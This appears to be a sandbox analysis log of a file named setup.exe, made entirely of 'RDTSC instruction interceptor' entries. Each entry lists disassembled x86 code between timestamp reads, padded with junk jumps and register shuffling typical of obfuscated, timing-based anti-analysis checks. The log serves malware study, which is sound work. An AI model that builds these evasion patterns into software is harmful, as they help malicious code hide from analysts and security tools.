Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0882 second address: 50D08C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A281h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FC16945A27Eh 0x00000010 and esp, FFFFFFF8h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC16945A287h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D08C3 second address: 50D08E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D08E7 second address: 50D08EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D08EB second address: 50D08F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D08F1 second address: 50D090E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A282h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D090E second address: 50D0912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0912 second address: 50D0916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0916 second address: 50D091C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D091C second address: 50D0922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0922 second address: 50D0966 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bh, AEh 0x00000011 pushfd 0x00000012 jmp 00007FC169461AA4h 0x00000017 or ax, 7B98h 0x0000001c jmp 00007FC169461A9Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0966 second address: 50D09C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC16945A283h 0x00000013 adc esi, 244621BEh 0x00000019 jmp 00007FC16945A289h 0x0000001e popfd 0x0000001f mov eax, 29292307h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D09C1 second address: 50D0A17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC169461AA3h 0x00000009 adc cx, C3CEh 0x0000000e jmp 00007FC169461AA9h 0x00000013 popfd 0x00000014 push eax 0x00000015 pop ebx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC169461AA8h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0A17 second address: 50D0A39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 3853h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC16945A285h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0A39 second address: 50D0A85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007FC169461A9Eh 0x00000011 sub ebx, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FC169461A9Ah 0x0000001c add eax, 061DFB68h 0x00000022 jmp 00007FC169461A9Bh 0x00000027 popfd 0x00000028 mov di, ax 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0A85 second address: 50D0ABD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A285h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007FC16945A27Eh 0x00000010 je 00007FC1DB2AFB56h 0x00000016 pushad 0x00000017 pushad 0x00000018 mov esi, 0D2667D3h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0ABD second address: 50D0B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 mov dl, 50h 0x00000008 pop esi 0x00000009 popad 0x0000000a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000011 jmp 00007FC169461A9Dh 0x00000016 mov ecx, esi 0x00000018 pushad 0x00000019 jmp 00007FC169461A9Ch 0x0000001e mov eax, 794EB421h 0x00000023 popad 0x00000024 je 00007FC1DB2B7349h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FC169461AA3h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0B0B second address: 50D0BCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC16945A27Fh 0x00000009 add esi, 0FBCA77Eh 0x0000000f jmp 00007FC16945A289h 0x00000014 popfd 0x00000015 mov ch, 5Dh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test byte ptr [76FB6968h], 00000002h 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FC16945A289h 0x00000028 sub eax, 0012CC66h 0x0000002e jmp 00007FC16945A281h 0x00000033 popfd 0x00000034 movzx esi, di 0x00000037 popad 0x00000038 jne 00007FC1DB2AFAABh 0x0000003e pushad 0x0000003f mov bx, 0A1Ch 0x00000043 pushfd 0x00000044 jmp 00007FC16945A285h 0x00000049 and ch, 00000076h 0x0000004c jmp 00007FC16945A281h 0x00000051 popfd 0x00000052 popad 0x00000053 mov edx, dword ptr [ebp+0Ch] 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FC16945A27Dh 0x0000005d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0BCA second address: 50D0BCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0BCF second address: 50D0C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC16945A27Dh 0x0000000a or cl, FFFFFF86h 0x0000000d jmp 00007FC16945A281h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 pushad 0x00000019 call 00007FC16945A27Ah 0x0000001e pop eax 0x0000001f push ebx 0x00000020 pop ecx 0x00000021 popad 0x00000022 push ebx 0x00000023 mov ecx, 3C8DCE79h 0x00000028 pop esi 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC16945A27Bh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0C20 second address: 50D0CB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FC169461A9Eh 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 mov esi, 2AA8293Dh 0x00000016 pushfd 0x00000017 jmp 00007FC169461A9Ah 0x0000001c adc si, 6B18h 0x00000021 jmp 00007FC169461A9Bh 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 jmp 00007FC169461AA9h 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 pushad 0x00000031 movzx esi, di 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 popad 0x00000038 push dword ptr [ebp+14h] 0x0000003b jmp 00007FC169461AA7h 0x00000040 push dword ptr [ebp+10h] 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0CB7 second address: 50D0CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0CBB second address: 50D0CC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0D3E second address: 50D0D50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, CBh 0x00000005 mov dx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0D50 second address: 50D0D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0D54 second address: 50D0D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0D58 second address: 50D0D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0D5E second address: 50D0D64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50D0D64 second address: 50D0D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0D99 second address: 50E0E30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A287h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC16945A284h 0x00000011 sub ecx, 21AAC2F8h 0x00000017 jmp 00007FC16945A27Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FC16945A288h 0x00000023 adc ah, 00000058h 0x00000026 jmp 00007FC16945A27Bh 0x0000002b popfd 0x0000002c popad 0x0000002d push eax 0x0000002e pushad 0x0000002f push esi 0x00000030 movsx edx, cx 0x00000033 pop eax 0x00000034 popad 0x00000035 xchg eax, ebp 0x00000036 jmp 00007FC16945A289h 0x0000003b mov ebp, esp 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0E30 second address: 50E0E43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0E43 second address: 50E0E49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0E49 second address: 50E0E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0B3D second address: 50E0B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0B41 second address: 50E0B54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0B54 second address: 50E0B8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, si 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC16945A280h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51606CF second address: 51606D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51606D5 second address: 51606D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51606D9 second address: 51606DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5150A96 second address: 5150A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 515090C second address: 5150912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5150912 second address: 5150916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5150916 second address: 515091A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 515091A second address: 5150966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FC16945A27Fh 0x00000010 mov ebp, esp 0x00000012 jmp 00007FC16945A286h 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC16945A287h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5150966 second address: 515096C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F01FB second address: 50F0216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A287h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F0216 second address: 50F0232 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC169461AA1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F0232 second address: 50F0261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A281h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov esi, 23BE3273h 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 mov edi, esi 0x00000018 mov cx, 9E63h 0x0000001c popad 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F0261 second address: 50F0268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F0268 second address: 50F026D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5150CC3 second address: 5150D57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, BD3Ah 0x00000007 pushfd 0x00000008 jmp 00007FC169461A9Bh 0x0000000d or ah, FFFFFFDEh 0x00000010 jmp 00007FC169461AA9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b mov dx, 68F2h 0x0000001f call 00007FC169461AA3h 0x00000024 mov esi, 7954F78Fh 0x00000029 pop eax 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c jmp 00007FC169461A9Bh 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007FC169461A9Bh 0x0000003c adc esi, 559A244Eh 0x00000042 jmp 00007FC169461AA9h 0x00000047 popfd 0x00000048 mov bx, si 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5150D57 second address: 5150DB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007FC16945A27Eh 0x00000011 push dword ptr [ebp+08h] 0x00000014 jmp 00007FC16945A280h 0x00000019 push 4B8DDD49h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007FC16945A27Ah 0x00000026 call 00007FC16945A282h 0x0000002b pop ecx 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5150DF0 second address: 5150DFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5150DFF second address: 5150E86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, al 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC16945A27Ch 0x00000013 add si, 2CA8h 0x00000018 jmp 00007FC16945A27Bh 0x0000001d popfd 0x0000001e call 00007FC16945A288h 0x00000023 pushfd 0x00000024 jmp 00007FC16945A282h 0x00000029 and cx, 5A38h 0x0000002e jmp 00007FC16945A27Bh 0x00000033 popfd 0x00000034 pop esi 0x00000035 popad 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov eax, 6CE14667h 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100726 second address: 510072C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 510072C second address: 5100732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100732 second address: 5100753 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FC169461AA0h 0x00000011 pop eax 0x00000012 mov ax, dx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100753 second address: 51007A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC16945A27Eh 0x00000011 sbb cl, 00000008h 0x00000014 jmp 00007FC16945A27Bh 0x00000019 popfd 0x0000001a mov bx, cx 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 mov ecx, 57ABC077h 0x00000026 popad 0x00000027 push FFFFFFFEh 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC16945A280h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51007A6 second address: 51007B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51007B5 second address: 5100816 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 54531947h 0x0000000e jmp 00007FC16945A287h 0x00000013 add dword ptr [esp], 22A6A6D1h 0x0000001a jmp 00007FC16945A286h 0x0000001f push 3F4E352Bh 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100816 second address: 510081A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 510081A second address: 5100820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100820 second address: 5100881 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC169461A9Bh 0x00000009 and ch, FFFFFFCEh 0x0000000c jmp 00007FC169461AA9h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xor dword ptr [esp], 49BE9B2Bh 0x0000001e jmp 00007FC169461A9Ch 0x00000023 mov eax, dword ptr fs:[00000000h] 0x00000029 pushad 0x0000002a mov ax, 781Dh 0x0000002e mov dx, si 0x00000031 popad 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FC169461A9Bh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100881 second address: 51008E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC16945A27Ah 0x00000013 jmp 00007FC16945A285h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007FC16945A280h 0x0000001f or ecx, 3997A768h 0x00000025 jmp 00007FC16945A27Bh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51008E7 second address: 5100914 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC169461A9Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100A1A second address: 5100AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FC16945A27Dh 0x0000000b sub ax, 7B36h 0x00000010 jmp 00007FC16945A281h 0x00000015 popfd 0x00000016 popad 0x00000017 xchg eax, edi 0x00000018 jmp 00007FC16945A27Eh 0x0000001d mov eax, dword ptr [76FBB370h] 0x00000022 jmp 00007FC16945A280h 0x00000027 xor dword ptr [ebp-08h], eax 0x0000002a pushad 0x0000002b jmp 00007FC16945A27Eh 0x00000030 pushfd 0x00000031 jmp 00007FC16945A282h 0x00000036 xor cx, E3E8h 0x0000003b jmp 00007FC16945A27Bh 0x00000040 popfd 0x00000041 popad 0x00000042 xor eax, ebp 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100AA8 second address: 5100AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100AAC second address: 5100AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100AB0 second address: 5100AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100AB6 second address: 5100AD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A286h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100AD0 second address: 5100AD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100AD4 second address: 5100B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007FC16945A27Ch 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007FC16945A280h 0x00000016 lea eax, dword ptr [ebp-10h] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007FC16945A27Ch 0x00000022 or esi, 3A11AB08h 0x00000028 jmp 00007FC16945A27Bh 0x0000002d popfd 0x0000002e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100B21 second address: 5100B6C instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov di, E638h 0x0000000b popad 0x0000000c mov dword ptr fs:[00000000h], eax 0x00000012 jmp 00007FC169461AA7h 0x00000017 mov esi, dword ptr [ebp+08h] 0x0000001a jmp 00007FC169461AA6h 0x0000001f mov eax, dword ptr [esi+10h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100B6C second address: 5100B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100B70 second address: 5100B76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
